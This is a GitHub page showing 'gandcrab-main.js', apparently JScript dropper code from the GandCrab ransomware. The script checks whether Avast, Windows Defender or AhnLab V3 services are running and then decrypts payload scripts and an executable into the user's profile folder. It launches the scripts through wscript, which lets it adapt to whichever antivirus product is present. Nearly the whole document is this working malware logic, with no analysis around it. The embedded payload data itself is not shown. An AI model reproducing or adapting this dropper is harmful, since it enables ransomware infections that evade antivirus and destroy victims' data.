-
Notifications
You must be signed in to change notification settings - Fork 7
/
gandcrab-main.js
93 lines (90 loc) · 2.94 KB
/
gandcrab-main.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
var bewktojmagvc = new ActiveXObject('Scripting.FileSystemObject');
var zevdbpspf = WScript.CreateObject("WScript.Shell");
var malScriptPath = zevdbpspf.ExpandEnvironmentStrings("%USERPROFILE%") + "\\";
var stwnydqsuji = WScript.CreateObject("shell.application");
function decryptAndDrop(ecryptedPayload, outputFileName) {
// decrypt and drop the payload
var ecryptedPayloadClean = ecryptedPayload.split("").reverse().join("");
decyptedPayload = '';
for (i = 0; i < (ecryptedPayloadClean.length / 2); i++) {
decyptedPayload += String.fromCharCode('0x' + ecryptedPayloadClean.substr(i * 2, 2));
}
var payloadFile = new ActiveXObject("ADODB.Stream");
payloadFile.Type = 2;
payloadFile.Charset = "ISO-8859-1";
payloadFile.Open();
payloadFile.WriteText(decyptedPayload);
payloadFile.SaveToFile(outputFileName, 2);
payloadFile.Close();
}
function runShellCommand(shellCommand) {
var osShell = WScript.CreateObject("WScript.Shell");
var cmdResponse = osShell.Exec(shellCommand);
var i = 0;
while (true) {
if (cmdResponse.Status == 0) {
WScript.Sleep(100);
i++;
} else {
break;
}
if (i == 1800) {
cmdResponse.Terminate();
break;
}
}
}
function getServiceStatus(serviceName) {
// gets all the service passed in the parameter
var serviceObj = GetObject("winmgmts:").ExecQuery("SELECT * FROM Win32_Service WHERE Name='" + serviceName + "'");
vaatgfp = new Enumerator(serviceObj);
xcabb = vaatgfp.item();
var bfdln = '';
try {
bfdln = xcabb.State;
} catch (e) {}
if (bfdln == 'Running') {
return true;
} else {
return false;
}
}
if (getServiceStatus('avast! Antivirus')) {
decryptAndDrop(pjqssmaj, malScriptPath + 'kyoxks.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'kyoxks.js"');
} catch (e) {}
WScript.sleep(15000);
}
if ((getServiceStatus('WdNisSvc')) || (getServiceStatus('WinDefend'))) {
decryptAndDrop(wvspotnpwm, malScriptPath + 'nykvwcajm.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'nykvwcajm.js"');
} catch (e) {}
}
if (getServiceStatus('NisSrv')) {
decryptAndDrop(hoszxms, malScriptPath + 'bervcptyvulur.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'bervcptyvulur.js"');
} catch (e) {}
}
if (getServiceStatus('V3 Service')) {
if (bewktojmagvc.FileExists(malScriptPath + "tgydmilslvp.txt")) {
decryptAndDrop(mvqwaqu, malScriptPath + 'recjyzcz.js');
try {
runShellCommand('wscript.exe "' + malScriptPath + 'recjyzcz.js"');
} catch (e) {}
} else {
decryptAndDrop('727272', malScriptPath + 'tgydmilslvp.txt');
try {
runShellCommand('wscript.exe "' + WScript.ScriptFullName + '"');
} catch (e) {}
WScript.Quit();
}
}
decryptAndDrop(xtaqukamdxzx, malScriptPath + 'dsoyaltj.exe');
if (bewktojmagvc.FileExists(malScriptPath + "dsoyaltj.exe")) {
try {
// stwnydqsuji.ShellExecute('"' + malScriptPath + "dsoyaltj.exe" + '"', '', "", "open", 1);
} catch (e) {}
}